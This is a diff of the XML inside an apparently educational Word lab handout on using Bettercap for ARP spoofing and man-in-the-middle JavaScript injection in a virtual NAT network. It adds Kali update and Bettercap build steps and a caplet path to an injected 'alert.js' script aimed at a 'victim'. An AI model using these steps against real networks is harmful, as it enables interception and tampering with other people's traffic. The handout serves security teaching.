--- a/Ethical_Hacking/Bettercap/4.Bettercap_Injecting_Javascript.docx
+++ b/Ethical_Hacking/Bettercap/4.Bettercap_Injecting_Javascript.docx
@@ -9,7 +9,7 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc190778886"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc190961505"/>
       <w:r>
         <w:t>Bettercap</w:t>
       </w:r>
@@ -76,7 +76,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc190778886" w:history="1">
+          <w:hyperlink w:anchor="_Toc190961505" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -103,7 +103,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190778886 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190961505 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -148,7 +148,7 @@
               <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc190778887" w:history="1">
+          <w:hyperlink w:anchor="_Toc190961506" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -175,7 +175,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190778887 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190961506 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -220,13 +220,13 @@
               <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc190778888" w:history="1">
+          <w:hyperlink w:anchor="_Toc190961507" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Injecting JavaScript</w:t>
+              <w:t>Update Kali Linux</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -247,7 +247,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190778888 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190961507 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -292,13 +292,13 @@
               <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc190778889" w:history="1">
+          <w:hyperlink w:anchor="_Toc190961508" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>1. Create a NAT Network</w:t>
+              <w:t>Install or Update Bettercap</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -319,7 +319,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190778889 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190961508 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -364,13 +364,13 @@
               <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc190778890" w:history="1">
+          <w:hyperlink w:anchor="_Toc190961509" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>2. View Local IP Address Information</w:t>
+              <w:t>Injecting JavaScript</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -391,7 +391,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190778890 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190961509 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -411,7 +411,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -436,13 +436,13 @@
               <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc190778891" w:history="1">
+          <w:hyperlink w:anchor="_Toc190961510" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>3. Automate bettercap with a Caplet File</w:t>
+              <w:t>1. Create a NAT Network</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -463,7 +463,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190778891 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190961510 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -508,7 +508,151 @@
               <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc190778892" w:history="1">
+          <w:hyperlink w:anchor="_Toc190961511" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>2. View Local IP Address Information</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190961511 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w14:ligatures w14:val="standardContextual"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc190961512" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>3. Automate bettercap with a Caplet File</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190961512 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w14:ligatures w14:val="standardContextual"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc190961513" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -535,7 +679,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190778892 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190961513 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -555,7 +699,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -580,7 +724,7 @@
               <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc190778893" w:history="1">
+          <w:hyperlink w:anchor="_Toc190961514" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -607,7 +751,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190778893 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190961514 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -627,7 +771,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -672,7 +816,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc190778887"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc190961506"/>
       <w:r>
         <w:t>Lab Requirements</w:t>
       </w:r>
@@ -741,11 +885,340 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc190778888"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc190961507"/>
+      <w:r>
+        <w:t>Update Kali Linux</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="2"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>This is a good idea to do before starting any lab with Kali Linux.</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9350"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t>sudo apt update</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t>sudo apt dist-upgrade -y</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="3" w:name="_Toc190961508"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Install or </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Update Bettercap</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="3"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Sniffing is the process of capturing and monitoring data packets that are passed through the network. It is used to capture the data of the victim</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>B</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ettercap is a powerful tool used to perform various MITM</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(man in the middle) attacks on a network. ARP Spoofing is a type of attack in which an attacker sends false ARP (Address Resolution Protocol) messages over a LAN</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(local area network).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>To install Bettercap, let’s do a clean build direct from the bettercap github repository. To make it easy, we are going to create a shell script to do it automatically.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">In Linux </w:t>
+      </w:r>
+      <w:r>
+        <w:sym w:font="Wingdings" w:char="F0E0"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> create a file named </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>install_bettercap.sh</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Copy and paste the following commands into the script file.</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="10255" w:type="dxa"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="10255"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cantSplit/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="10255" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t>cd ~</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t>sudo apt update</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t>sudo apt install -y golang git libusb-1.0-0-dev libpcap-dev libnetfilter-queue-dev</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo </w:t>
+            </w:r>
+            <w:r>
+              <w:t>git clone https://github.com/bettercap/bettercap.git</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t>cd bettercap</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t>go install</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t>go build</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t>sudo ./bettercap</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Type: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>bash install_bettercap.sh</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to run the shell script. This may take some time.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>In bettercap type in the following command to update bettercap.</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9350"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t>caplets.update</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t>update.check on</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Type </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>q</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to q</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>uit bettercap.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc190961509"/>
       <w:r>
         <w:t>Injecting JavaScript</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
       <w:r>
@@ -825,8 +1298,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc190778058"/>
-      <w:bookmarkStart w:id="4" w:name="_Toc190778889"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc190778058"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc190961510"/>
       <w:r>
         <w:t>1</w:t>
       </w:r>
@@ -839,8 +1312,8 @@
       <w:r>
         <w:t>Create a NAT Network</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="3"/>
-      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p>
       <w:r>
@@ -1038,14 +1511,23 @@
         <w:sym w:font="Wingdings" w:char="F0E0"/>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> go back and switch to NAT Network.</w:t>
+        <w:t xml:space="preserve"> go back and switch to NAT Network</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:sym w:font="Wingdings" w:char="F0E0"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Click OK.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc190778890"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc190961511"/>
       <w:r>
         <w:t>2</w:t>
       </w:r>
@@ -1061,7 +1543,7 @@
       <w:r>
         <w:t xml:space="preserve"> Local IP Address Information</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p>
       <w:r>
@@ -1080,7 +1562,13 @@
         <w:t>of the network interface that you’re using</w:t>
       </w:r>
       <w:r>
-        <w:t>. It is commonly eth0.</w:t>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>In a VirtualBox VM i</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t is commonly eth0.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -1280,14 +1768,14 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc190778891"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc190961512"/>
       <w:r>
         <w:t xml:space="preserve">3. </w:t>
       </w:r>
       <w:r>
         <w:t>Automate bettercap with a Caplet File</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkEnd w:id="8"/>
     </w:p>
     <w:p>
       <w:r>
@@ -1465,14 +1953,14 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc190778892"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc190961513"/>
       <w:r>
         <w:t>4</w:t>
       </w:r>
       <w:r>
         <w:t>. bettercap JavaScript Injection</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="7"/>
+      <w:bookmarkEnd w:id="9"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1635,16 +2123,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Go to the line shown</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>at the bottom</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, add the path to your </w:t>
+        <w:t xml:space="preserve">Put </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the path to your </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1654,10 +2136,10 @@
         <w:t>alert.js</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> file.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Put is at the end of the </w:t>
+        <w:t xml:space="preserve"> file at the</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> end of the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1684,21 +2166,53 @@
         <w:t xml:space="preserve"> as shown</w:t>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve"> below</w:t>
+      </w:r>
+      <w:r>
         <w:t>. The path will be longer than is shown.</w:t>
       </w:r>
     </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9350"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>,</w:t>
+            </w:r>
+            <w:r>
+              <w:t>*</w:t>
+            </w:r>
+            <w:r>
+              <w:t>:</w:t>
+            </w:r>
+            <w:r>
+              <w:t>/home/user/alert.js</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
     <w:p>
-      <w:pPr>
-        <w:ind w:hanging="1080"/>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DC1E20A" wp14:editId="7C62A541">
-            <wp:extent cx="7294425" cy="857250"/>
-            <wp:effectExtent l="38100" t="38100" r="97155" b="95250"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E349C2F" wp14:editId="4ADDC568">
+            <wp:extent cx="5943600" cy="698517"/>
+            <wp:effectExtent l="38100" t="38100" r="95250" b="101600"/>
             <wp:docPr id="2" name="Picture 2"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -1719,7 +2233,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="7303923" cy="858366"/>
+                      <a:ext cx="5943600" cy="698517"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1746,38 +2260,6 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="TableGrid"/>
-        <w:tblW w:w="0" w:type="auto"/>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9350"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9350" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t>,</w:t>
-            </w:r>
-            <w:r>
-              <w:t>*</w:t>
-            </w:r>
-            <w:r>
-              <w:t>:</w:t>
-            </w:r>
-            <w:r>
-              <w:t>/home/user/alert.js</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
@@ -1873,7 +2355,7 @@
             <w:pPr>
               <w:pStyle w:val="Code"/>
             </w:pPr>
-            <w:bookmarkStart w:id="8" w:name="_Hlk84050432"/>
+            <w:bookmarkStart w:id="10" w:name="_Hlk84050432"/>
             <w:r>
               <w:t xml:space="preserve">sudo </w:t>
             </w:r>
@@ -1893,7 +2375,7 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:bookmarkEnd w:id="8"/>
+    <w:bookmarkEnd w:id="10"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
@@ -2029,10 +2511,17 @@
     </w:sdt>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">You have successfully spoofed your victim </w:t>
       </w:r>
       <w:r>
-        <w:t>with your javascript injection</w:t>
+        <w:t xml:space="preserve">with your </w:t>
+      </w:r>
+      <w:r>
+        <w:t>JavaScript</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> injection</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
@@ -2064,11 +2553,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc190778893"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc190961514"/>
       <w:r>
         <w:t>Assignment Submission</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:r>
@@ -2168,7 +2657,7 @@
       <w:t>/</w:t>
     </w:r>
     <w:r>
-      <w:t>17</w:t>
